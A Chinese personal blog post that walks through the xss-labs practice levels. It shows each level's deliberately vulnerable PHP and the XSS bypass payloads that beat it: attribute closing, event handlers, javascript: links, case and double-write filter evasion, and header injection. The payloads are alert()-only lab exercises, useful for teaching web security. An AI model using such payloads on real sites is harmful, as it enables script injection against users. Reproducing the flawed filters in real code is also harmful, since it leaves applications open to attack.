<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>Web安全——XSS | 个人博客</title>
    <meta name="generator" content="VuePress 1.9.9">
    <link rel="icon" href="/wangdengdeng/favicon.ico">
    <meta name="description" content="个人博客">
    <meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no">
    
    <link rel="preload" href="/wangdengdeng/assets/css/0.styles.aece1d96.css" as="style"><link rel="preload" href="/wangdengdeng/assets/js/app.f1f99d8b.js" as="script"><link rel="preload" href="/wangdengdeng/assets/js/6.e2e47644.js" as="script"><link rel="preload" href="/wangdengdeng/assets/js/14.593cb0fe.js" as="script"><link rel="prefetch" href="/wangdengdeng/assets/js/10.03f88c15.js"><link rel="prefetch" href="/wangdengdeng/assets/js/11.72cf17ac.js"><link rel="prefetch" href="/wangdengdeng/assets/js/12.f671f075.js"><link rel="prefetch" href="/wangdengdeng/assets/js/13.617d7347.js"><link rel="prefetch" href="/wangdengdeng/assets/js/15.0e5ed7f1.js"><link rel="prefetch" href="/wangdengdeng/assets/js/16.62628b6e.js"><link rel="prefetch" href="/wangdengdeng/assets/js/17.0a9a378d.js"><link rel="prefetch" href="/wangdengdeng/assets/js/18.6562709a.js"><link rel="prefetch" href="/wangdengdeng/assets/js/19.4e5da212.js"><link rel="prefetch" href="/wangdengdeng/assets/js/2.53fca3c4.js"><link rel="prefetch" href="/wangdengdeng/assets/js/20.3d1af487.js"><link rel="prefetch" href="/wangdengdeng/assets/js/21.9b13d7a3.js"><link rel="prefetch" href="/wangdengdeng/assets/js/22.40df8487.js"><link rel="prefetch" href="/wangdengdeng/assets/js/23.e0f56263.js"><link rel="prefetch" href="/wangdengdeng/assets/js/24.28ee286e.js"><link rel="prefetch" href="/wangdengdeng/assets/js/25.00bc6ec8.js"><link rel="prefetch" href="/wangdengdeng/assets/js/26.2309cdc0.js"><link rel="prefetch" href="/wangdengdeng/assets/js/3.cb810e63.js"><link rel="prefetch" href="/wangdengdeng/assets/js/4.6efe2eb7.js"><link rel="prefetch" href="/wangdengdeng/assets/js/5.63f29a16.js"><link rel="prefetch" href="/wangdengdeng/assets/js/7.8704393b.js"><link rel="prefetch" href="/wangdengdeng/assets/js/8.8ab062d7.js"><link rel="prefetch" href="/wangdengdeng/assets/js/9.6d7262ea.js">
    <link rel="stylesheet" href="/wangdengdeng/assets/css/0.styles.aece1d96.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div id="global-layout" data-v-7f2e4136><header class="header-container" style="background-size:cover;background-repeat:no-repeat;background-position:center;background-attachment:scroll;background-image:url(/wangdengdeng/post-bg.jpeg);" data-v-93921ff8 data-v-7f2e4136><nav class="navbar" style="position:absolute;opacity:1;transition:all 0.5s ease-in-out;" data-v-93921ff8><a href="/wangdengdeng/" class="navbar-link router-link-active">
    
  </a> <ul class="navbar-links"><li><a href="/wangdengdeng/" class="router-link-active">
        主页
      </a></li><li><a href="/wangdengdeng/about/">
        关于作者
      </a></li><li><a href="/wangdengdeng/tags/">
        技术栈
      </a></li></ul> <div id="nav-icon"><span></span><span></span><span></span></div></nav> <div class="header-title" data-v-93921ff8 data-v-93921ff8><h1 data-v-93921ff8>Web安全——XSS</h1> <p data-v-93921ff8></p></div></header> <div class="container" data-v-b3fda33c data-v-7f2e4136><main class="main" style="width:60%;" data-v-b3fda33c><div class="post" data-v-b3fda33c data-v-b3fda33c><article class="main-div"><div class="post-content content content__default"><p>本篇博客主要是对常见XSS漏洞的总结</p> <blockquote><p>注：由于GitHub平台未对博客内容进行过滤，所以本文所有xss代码均进行处理。</p> <p>请读者自行鉴别</p></blockquote> <h1 id="一、xss攻击概述"><a href="#一、xss攻击概述" class="header-anchor">#</a> 一、XSS攻击概述</h1> <blockquote><p><strong>一、什么是XSS攻击</strong>
XSS攻击中文名称为：跨站脚本攻击，XSS的重点不在于跨站，而在于脚本的攻击。
XSS攻击的工作原理：攻击者会在web页面中插入一些恶意的script代码。当用户浏览该页面的时候，那么嵌套在该页面的代码就会执行，因此会达到攻击用户的目的。
XSS的分类：XSS攻击最主要分为如下几类，反射型，存储型，DOM-based型。反射型和DOM-based型可以归类于非持久性XSS攻击。存储型可以归类于持久性XSS攻击。</p></blockquote> <h1 id="二、xss常见类型"><a href="#二、xss常见类型" class="header-anchor">#</a> 二、XSS常见类型</h1> <h2 id="反射型"><a href="#反射型" class="header-anchor">#</a> 反射型:</h2> <p>​		攻击者发送给被攻击者一个邮件信息或者链接，当被攻击者点击并访问该链接时，此时就会向攻击者的目标服务器发起请求，此时根据请求返回相关的<code>script</code>代码，当浏览器解析这些<code>script</code>代码时，此时代码就会在浏览器执行，造成用户被攻击。</p> <p>xss-labs题解：</p> <h3 id="_1-直接接受表单传输的值-拼接在html代码中执行"><a href="#_1-直接接受表单传输的值-拼接在html代码中执行" class="header-anchor">#</a> 1.直接接受表单传输的值，拼接在html代码中执行</h3> <p>​	此时直接输出的php代码就会按照html代码解析执行，类比一下 <code>echo &quot;&lt;br&gt;&quot;;</code></p> <div class="language-php extra-class"><pre class="language-php"><code><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> 
<span class="token function">ini_set</span><span class="token punctuation">(</span><span class="token string double-quoted-string">&quot;display_errors&quot;</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string double-quoted-string">&quot;name&quot;</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token string double-quoted-string">&quot;&lt;h2 align=center&gt;欢迎用户&quot;</span><span class="token operator">.</span><span class="token variable">$str</span><span class="token operator">.</span><span class="token string double-quoted-string">&quot;&lt;/h2&gt;&quot;</span><span class="token punctuation">;</span>
<span class="token delimiter important">?&gt;</span></span>
</code></pre></div><h3 id="_2-一个函数htmlspecialchars"><a href="#_2-一个函数htmlspecialchars" class="header-anchor">#</a> 2.一个函数	<strong>htmlspecialchars()</strong></h3> <h4 id="定义和用法"><a href="#定义和用法" class="header-anchor">#</a> 定义和用法</h4> <p>htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。简单的来说，<strong>就是将输出时会交给解析的html代码转换为不可执行的字符输出</strong>，从而去避免xss脚本的执行</p> <p>预定义的字符是：（都成为自己）</p> <ul><li>&amp; （和号）成为 &amp;</li> <li>&quot; （双引号）成为 &quot;</li> <li>' （单引号）成为 '</li> <li>&lt; （小于）成为 &lt;</li> <li>&gt; （大于）成为 &gt;</li></ul> <div class="language-php extra-class"><pre class="language-php"><code><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> 
<span class="token function">ini_set</span><span class="token punctuation">(</span><span class="token string double-quoted-string">&quot;display_errors&quot;</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string double-quoted-string">&quot;keyword&quot;</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token string double-quoted-string">&quot;&lt;h2 align=center&gt;没有找到和&quot;</span><span class="token operator">.</span><span class="token function">htmlspecialchars</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token string double-quoted-string">&quot;相关的结果.&lt;/h2&gt;&quot;</span><span class="token operator">.</span><span class="token string single-quoted-string">'&lt;center&gt;
&lt;form action=level2.php method=GET&gt;//get提交新表单，将str字符实体写入value属性
&lt;input name=keyword  value=&quot;'</span><span class="token operator">.</span><span class="token variable">$str</span><span class="token operator">.</span><span class="token string single-quoted-string">'&quot;&gt;
&lt;input type=submit name=submit value=&quot;搜索&quot;/&gt;
&lt;/form&gt;
&lt;/center&gt;'</span><span class="token punctuation">;</span>
<span class="token delimiter important">?&gt;</span></span>

</code></pre></div><p><strong><input name="keyword" value="'.$str.'"></strong></p> <p>在这里，只要用脚本将value属性==闭合==，从而使脚本直接插入在html代码（表单）中</p> <p>(<strong>==&quot;&gt;==<script>alert(/(≧▽≦)/)</script></strong>)</p> <p>高亮闭合属性，后面的脚本不变。</p> <h3 id="_3-深入一个函数htmlspecialchars-的传参"><a href="#_3-深入一个函数htmlspecialchars-的传参" class="header-anchor">#</a> 3.深入一个函数htmlspecialchars()的传参：</h3> <div class="language-php extra-class"><pre class="language-php"><code><span class="token variable">$str</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string double-quoted-string">&quot;keyword&quot;</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token string double-quoted-string">&quot;&lt;h2 align=center&gt;没有找到和&quot;</span><span class="token operator">.</span><span class="token function">htmlspecialchars</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token string double-quoted-string">&quot;相关的结果.&lt;/h2&gt;&quot;</span><span class="token operator">.</span><span class="token string double-quoted-string">&quot;&lt;center&gt;
&lt;form action=level3.php method=GET&gt;
&lt;input name=keyword  value='&quot;</span><span class="token operator">.</span><span class="token function">htmlspecialchars</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token string double-quoted-string">&quot;'&gt;//两次进行实体转换
&lt;input type=submit name=submit value=搜索 /&gt;
&lt;/form&gt;
&lt;/center&gt;&quot;</span><span class="token punctuation">;</span>
<span class="token operator">?</span><span class="token operator">&gt;</span>
</code></pre></div><p>可选。规定如何处理引号、无效的编码以及使用哪种文档类型。</p> <p>可用的引号类型：</p> <ul><li>ENT_COMPAT - <strong>==默认。仅编码双引号==</strong>。</li> <li>ENT_QUOTES - 编码双引号和单引号。</li> <li>ENT_NOQUOTES - 不编码任何引号。</li></ul> <p>故若第二个参数未设置，则不会转换==<strong>单引号</strong>==，但是如果使用常规的**&lt;&gt;**标签仍无法绕过，所以：</p> <h5 id="一个input属性-onclick-避开-的实体化"><a href="#一个input属性-onclick-避开-的实体化" class="header-anchor">#</a> 一个input属性：onclick，避开&lt;&gt;的实体化</h5> <h6 id="定义"><a href="#定义" class="header-anchor">#</a> <strong>定义：</strong></h6> <p>onclick 事件在用户单击元素时发生。</p> <div class="language-php extra-class"><pre class="language-php"><code><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> <span class="token keyword">echo</span> <span class="token string single-quoted-string">'&lt;input onclick=alert('</span>wangdengdeng<span class="token string single-quoted-string">')&gt;'</span><span class="token punctuation">;</span> <span class="token delimiter important">?&gt;</span></span>
</code></pre></div><p>当单击文本框（input无type属性默认为text）时，执行alert，且需要点击text框去实现，此时alert中须放置数字或者用**/字符串/**</p> <p>用==/ /==: 因为//构成了正则表达式，也是一个字符串。</p> <h5 id="第二个input属性-onfucus-其实也是通过单击输入框执行js代码"><a href="#第二个input属性-onfucus-其实也是通过单击输入框执行js代码" class="header-anchor">#</a> 第二个input属性：onfucus，其实也是通过单击输入框执行js代码</h5> <p>这里可以通过<code>&lt;input&gt;</code>标签的一些特殊事件来执行js代码</p> <p>构造代码：<code>level3.php?keyword='onfocus=javascript:rt('99') &gt; //&amp;submit=搜索</code></p> <p>' &lt;&gt;</p> <h3 id="_4-黑名单o-n-scr-ipt绕过"><a href="#_4-黑名单o-n-scr-ipt绕过" class="header-anchor">#</a> 4.黑名单o_n	&lt;scr_ipt绕过</h3> <p>源码：</p> <div class="language-php extra-class"><pre class="language-php"><code>&lt;?php 
ini_set(&quot;display_errors&quot;, 0);
$str = strtolower($_GET[&quot;keyword&quot;]);
$str2=str_replace(&quot;&lt;script&quot;,&quot;&lt;scr_ipt&quot;,$str);
$str3=str_replace(&quot;on&quot;,&quot;o_n&quot;,$str2);
echo &quot;<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>h2</span> <span class="token attr-name">align</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span>center</span><span class="token punctuation">&gt;</span></span>没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>h2</span><span class="token punctuation">&gt;</span></span>&quot;.'<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>center</span><span class="token punctuation">&gt;</span></span>
</code></pre></div><p>做一个替换，使脚本失效</p> <p>绕过方法：</p> <div class="language-php+HTML extra-class"><pre class="language-text"><code>(&quot;&gt;&lt;a href=&quot;javascript:alert(/2/)&quot;&gt;alert&lt;/a&gt; &lt;&quot;)
</code></pre></div><p>将标签闭合为：</p> <div class="language-html extra-class"><pre class="language-html"><code>(value=&quot;&quot;&gt;<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>a</span> <span class="token attr-name">href</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>javascript:alert(/admin/)<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>alert<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>a</span><span class="token punctuation">&gt;</span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>&quot;&quot;</span><span class="token punctuation">&gt;</span></span>//最后闭合)
</code></pre></div><p>意为定义a标签的超链接</p> <h3 id="_5-大小写绕过"><a href="#_5-大小写绕过" class="header-anchor">#</a> 5.大小写绕过</h3> <p>绕过：(大小写绕过过滤黑名单的<strong>部分</strong>， HrEf也可)</p> <div class="language-php+HTML extra-class"><pre class="language-text"><code>(&quot;&gt;&lt;a HREf=&quot;javascript:alert(/4/)&quot;&gt;alert&lt;/a&gt; &lt;&quot;)
</code></pre></div><p>大写函数：</p> <div class="language-php extra-class"><pre class="language-php"><code><span class="token variable">$str</span> <span class="token operator">=</span><span class="token function">strtolower</span><span class="token punctuation">(</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string double-quoted-string">&quot;keyword&quot;</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre></div><h3 id="_6-双写绕过"><a href="#_6-双写绕过" class="header-anchor">#</a> 6.双写绕过</h3> <p>双写绕过的原理是str_replace此函数对于敏感字符串只进行一次替换。</p> <h3 id="_7-源码"><a href="#_7-源码" class="header-anchor">#</a> 7.源码：</h3> <div class="language-php+HTML extra-class"><pre class="language-text"><code>&lt;?php 
ini_set(&quot;display_errors&quot;, 0);
$str = strtolower($_GET[&quot;keyword&quot;]);//小写
$str2=str_replace(&quot;script&quot;,&quot;scr_ipt&quot;,$str);//替换 script、on、src、data、herf、&quot;号
$str3=str_replace(&quot;on&quot;,&quot;o_n&quot;,$str2);
$str4=str_replace(&quot;src&quot;,&quot;sr_c&quot;,$str3);
$str5=str_replace(&quot;data&quot;,&quot;da_ta&quot;,$str4);
$str6=str_replace(&quot;href&quot;,&quot;hr_ef&quot;,$str5);
$str7=str_replace('&quot;','&amp;quot',$str6);
echo '&lt;center&gt;
&lt;form action=level8.php method=GET&gt;
&lt;input name=keyword  value=&quot;'.htmlspecialchars($str).'&quot;&gt;
&lt;input type=submit name=submit value=添加友情链接 /&gt;
&lt;/form&gt;
&lt;/center&gt;';
?&gt;
&lt;?php
 echo '&lt;center&gt;&lt;BR&gt;&lt;a href=&quot;'.$str7.'&quot;&gt;友情链接&lt;/a&gt;&lt;/center&gt;';
?&gt;
&lt;center&gt;&lt;img src=level8.jpg&gt;&lt;/center&gt;
&lt;?php 
echo &quot;&lt;h3 align=center&gt;payload的长度:&quot;.strlen($str7).&quot;&lt;/h3&gt;&quot;;
?&gt;
</code></pre></div><p>首先对于**==”号==<strong>进行的过滤导致了value标签无法闭合，双写就失效了。导致的结果是无法构成完整herf，所以进行URL编码（<strong>Unicode</strong>）将完整herf转换为编码,执行，恐怕只能用于</strong>链接解析**。</p> <h3 id="_8-源码"><a href="#_8-源码" class="header-anchor">#</a> 8.源码：</h3> <div class="language-php extra-class"><pre class="language-php"><code><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token constant boolean">false</span><span class="token operator">===</span><span class="token function">strpos</span><span class="token punctuation">(</span><span class="token variable">$str7</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'http://'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token comment">//strpos		对于串第一次出现的位置进行查找</span>
<span class="token punctuation">{</span>
  <span class="token keyword">echo</span> <span class="token string single-quoted-string">'&lt;center&gt;&lt;BR&gt;&lt;a href=&quot;您的链接不合法？有没有！&quot;&gt;友情链接&lt;/a&gt;&lt;/center&gt;'</span><span class="token punctuation">;</span><span class="token comment">//常规过滤之后的</span>
        <span class="token punctuation">}</span>
<span class="token keyword">else</span>
<span class="token punctuation">{</span>
  <span class="token keyword">echo</span> <span class="token string single-quoted-string">'&lt;center&gt;&lt;BR&gt;&lt;a href=&quot;'</span><span class="token operator">.</span><span class="token variable">$str7</span><span class="token operator">.</span><span class="token string single-quoted-string">'&quot;&gt;友情链接&lt;/a&gt;&lt;/center&gt;'</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token delimiter important">?&gt;</span></span>
</code></pre></div><p>绕过：将alert()中换为http://</p> <blockquote><p>javascript: 是一个伪协议</p></blockquote> <blockquote><p>javascript:是表示在触发<a>默认动作时，执行一段JavaScript代码，而 javascript:; 表示什么都不执行，这样点击<a>时就没有任何反应。</a></a></p></blockquote> <h3 id="_9-input的新属性"><a href="#_9-input的新属性" class="header-anchor">#</a> 9.input的新属性</h3> <div class="language-php extra-class"><pre class="language-php"><code><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> 
<span class="token function">ini_set</span><span class="token punctuation">(</span><span class="token string double-quoted-string">&quot;display_errors&quot;</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string double-quoted-string">&quot;keyword&quot;</span><span class="token punctuation">]</span><span class="token punctuation">;</span><span class="token comment">//只向内传递了两个参数</span>
<span class="token variable">$str11</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string double-quoted-string">&quot;t_sort&quot;</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$str22</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string double-quoted-string">&quot;&gt;&quot;</span><span class="token punctuation">,</span><span class="token string double-quoted-string">&quot;&quot;</span><span class="token punctuation">,</span><span class="token variable">$str11</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//对t_sort进行换空处理（否定插入&lt;&gt;）</span>
<span class="token variable">$str33</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string double-quoted-string">&quot;&lt;&quot;</span><span class="token punctuation">,</span><span class="token string double-quoted-string">&quot;&quot;</span><span class="token punctuation">,</span><span class="token variable">$str22</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token string double-quoted-string">&quot;&lt;h2 align=center&gt;没有找到和&quot;</span><span class="token operator">.</span><span class="token function">htmlspecialchars</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token string double-quoted-string">&quot;相关的结果.&lt;/h2&gt;&quot;</span><span class="token operator">.</span><span class="token string single-quoted-string">'&lt;center&gt;
&lt;form id=search&gt;
&lt;input name=&quot;t_link&quot;  value=&quot;'</span><span class="token operator">.</span><span class="token string single-quoted-string">'&quot; type=&quot;hidden&quot;&gt;
&lt;input name=&quot;t_history&quot;  value=&quot;'</span><span class="token operator">.</span><span class="token string single-quoted-string">'&quot; type=&quot;hidden&quot;&gt;
&lt;input name=&quot;t_sort&quot;  value=&quot;'</span><span class="token operator">.</span><span class="token variable">$str33</span><span class="token operator">.</span><span class="token string single-quoted-string">'&quot; type=&quot;hidden&quot;&gt;
&lt;/form&gt;
&lt;/center&gt;'</span><span class="token punctuation">;</span>
<span class="token delimiter important">?&gt;</span></span>
</code></pre></div><p><strong>type</strong> <strong>hidden</strong></p> <p>就是进行用户不必要的参数传递，或者说时为了保护传参的安全性</p> <p><strong>绕过</strong></p> <p>将value闭合，后直接加type为可见的text，直接变成文本框可见</p> <p>(<strong>&quot; onfocus=javascript:alert(/23/) type=&quot;text&quot;</strong>)</p> <h3 id="_10-referer"><a href="#_10-referer" class="header-anchor">#</a> 10.referer:</h3> <div class="language-php extra-class"><pre class="language-php"><code>&lt;?php 
ini_set(&quot;display_errors&quot;, 0);
$str = $_GET[&quot;keyword&quot;];
$str00 = $_GET[&quot;t_sort&quot;];
$str11=$_SERVER['HTTP_REFERER'];//获得referer请求头
$str22=str_replace(&quot;&gt;&quot;,&quot;&quot;,$str11);
$str33=str_replace(&quot;&lt;&quot;,&quot;&quot;,$str22);
echo &quot;<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>h2</span> <span class="token attr-name">align</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span>center</span><span class="token punctuation">&gt;</span></span>没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>h2</span><span class="token punctuation">&gt;</span></span>&quot;.'<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>center</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>form</span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span>search</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">name</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>t_link<span class="token punctuation">&quot;</span></span>  <span class="token attr-name">value</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span><span class="token punctuation">'</span>.'<span class="token punctuation">&quot;</span></span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>hidden<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">name</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>t_history<span class="token punctuation">&quot;</span></span>  <span class="token attr-name">value</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span><span class="token punctuation">'</span>.'<span class="token punctuation">&quot;</span></span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>hidden<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">name</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>t_sort<span class="token punctuation">&quot;</span></span>  <span class="token attr-name">value</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span><span class="token punctuation">'</span>.htmlspecialchars($str00).'<span class="token punctuation">&quot;</span></span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>hidden<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">name</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>t_ref<span class="token punctuation">&quot;</span></span>  <span class="token attr-name">value</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span><span class="token punctuation">'</span>.$str33.'<span class="token punctuation">&quot;</span></span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>hidden<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>//ref接收referer
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>form</span><span class="token punctuation">&gt;</span></span>
</code></pre></div><p>所以直接抓包给referer传入就行</p> <p>(<strong>&quot; onfocus=javascript:alert(/45/) type=&quot;text&quot;</strong>)</p> <h3 id="_11-ua没的说"><a href="#_11-ua没的说" class="header-anchor">#</a> 11.UA没的说</h3> <h3 id="_12-cookie的构成"><a href="#_12-cookie的构成" class="header-anchor">#</a> 12.Cookie的构成</h3> <p>13题和之前的十二十一类似，但是要了解cookie的构成。</p> <div class="language-php extra-class"><pre class="language-php"><code><span class="token function">setcookie</span><span class="token punctuation">(</span><span class="token string double-quoted-string">&quot;user&quot;</span><span class="token punctuation">,</span> <span class="token string double-quoted-string">&quot;call me maybe?&quot;</span><span class="token punctuation">,</span> <span class="token function">time</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">+</span><span class="token number">3600</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre></div><p>在浏览器中：</p> <p><strong>Cookie	  user=call+me+maybe%3F</strong></p> <p>所以要注意bp的构造格式</p> <h3 id="_13-图片exif构造xss"><a href="#_13-图片exif构造xss" class="header-anchor">#</a> 13.图片exif构造xss</h3> <p>简单地说，就是exif的格式下的图片（<strong>原相机拍照，未经过处理</strong>）会保存图片的一部分信心（包括创建时间，镜头制造商开定位还会暴露经纬度等等信息），这在xss的利用中就是修改这部分信息，写入脚本，在能读取exif图片信息的网站上传显示该图片信息，但是该网站也未对恶意脚本进行过滤（如果有，就是过滤尖括号），此时可以执行xss脚本，造成信息泄露。</p> <h3 id="_14-文件包含"><a href="#_14-文件包含" class="header-anchor">#</a> 14.文件包含</h3> <div class="language-ph extra-class"><pre class="language-text"><code>$str = $_GET[&quot;src&quot;];
echo '&lt;body&gt;&lt;span class=&quot;ng-include:'.htmlspecialchars($str).'&quot;&gt;&lt;/span&gt;&lt;/body&gt;';
</code></pre></div><blockquote><p>1、ng-include 指令用于包含外部的 HTML文件。</p></blockquote> <p>​      2、包含的内容将作为指定元素的子节点。</p> <p>​	  3、ng-include 属性的值可以是一个表达式，返回一个文件名。</p> <div class="language- extra-class"><pre><code> 4、默认情况下，包含的文件需要包含在同一个域名下。
</code></pre></div><blockquote><p>特别值得注意的几点如下：</p></blockquote> <p>​		1.ng-include,如果单纯指定地址，必须要加引号</p> <p>​		2.ng-include,加载外部html，script标签中的内容不执行</p> <p>​		3.ng-include,加载外部html中含有style标签样式可以识别</p> <p>​		所以只需要引用一个包含xss的文件就可以了</p> <p>payload:</p> <div class="language-html extra-class"><pre class="language-html"><code>(src= 'level10.php?t_sort=&quot; onclick=alert(/89/) type=&quot;text&quot; &gt;&lt; ')
  
</code></pre></div><h3 id="_15-被过滤"><a href="#_15-被过滤" class="header-anchor">#</a> 15./被过滤</h3> <p>源码：</p> <div class="language-php extra-class"><pre class="language-php"><code><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> 
<span class="token function">ini_set</span><span class="token punctuation">(</span><span class="token string double-quoted-string">&quot;display_errors&quot;</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token function">strtolower</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string double-quoted-string">&quot;keyword&quot;</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$str2</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string double-quoted-string">&quot;script&quot;</span><span class="token punctuation">,</span><span class="token string double-quoted-string">&quot;&amp;nbsp;&quot;</span><span class="token punctuation">,</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//script /进行替换，同时空也被替换</span>
<span class="token variable">$str3</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string double-quoted-string">&quot; &quot;</span><span class="token punctuation">,</span><span class="token string double-quoted-string">&quot;&amp;nbsp;&quot;</span><span class="token punctuation">,</span><span class="token variable">$str2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$str4</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string double-quoted-string">&quot;/&quot;</span><span class="token punctuation">,</span><span class="token string double-quoted-string">&quot;&amp;nbsp;&quot;</span><span class="token punctuation">,</span><span class="token variable">$str3</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$str5</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string double-quoted-string">&quot;	&quot;</span><span class="token punctuation">,</span><span class="token string double-quoted-string">&quot;&amp;nbsp;&quot;</span><span class="token punctuation">,</span><span class="token variable">$str4</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token string double-quoted-string">&quot;&lt;center&gt;&quot;</span><span class="token operator">.</span><span class="token variable">$str5</span><span class="token operator">.</span><span class="token string double-quoted-string">&quot;&lt;/center&gt;&quot;</span><span class="token punctuation">;</span>
<span class="token delimiter important">?&gt;</span></span>
